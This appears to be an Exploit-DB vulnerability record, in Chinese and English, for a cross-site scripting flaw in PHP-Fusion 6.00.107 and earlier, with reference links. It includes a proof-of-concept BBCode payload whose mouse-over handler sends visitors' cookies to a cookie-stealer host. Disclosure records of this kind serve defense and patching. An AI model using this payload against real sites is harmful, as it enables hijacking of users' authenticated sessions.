https://www.exploit-db.com/exploits/26209
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-033

PHP-Fusion是一个轻量级PHP开源内容管理系统。它采用mySQL数据库存储网站内容，并提供一个简单，全面的后台管理系统。PHP-Fusion包含大多数CMS系统所具有的功能。PHP-Fusion6.00.107及其早期版本中存在跨站脚本(XSS)漏洞。远程攻击者可利用该漏洞借助于嵌套的、畸形的URLBBCode标记向HTML中注入任意的web脚本。

source: http://www.securityfocus.com/bid/14688/info

PHP-Fusion is prone to a script injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. 

[URL=http://aaaaaa.com/UR[url=aa.com&&OnMouseOver=jscript:location='http://direct/to/cookie/stealer.com/?c='+cookie;
location="http://google.com]][/URL][/url]

来源:XF
名称:phpfusion-bbcode-tags-xss(22056)
链接:http://xforce.iss.net/xforce/xfdb/22056
来源:BID
名称:14688
链接:http://www.securityfocus.com/bid/14688
来源:SECUNIA
名称:16632
链接:http://secunia.com/advisories/16632/
来源:BUGTRAQ
名称:20050828PHP-Fusion<=v6.00.107XSSexploit
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=112533836103267&w;=2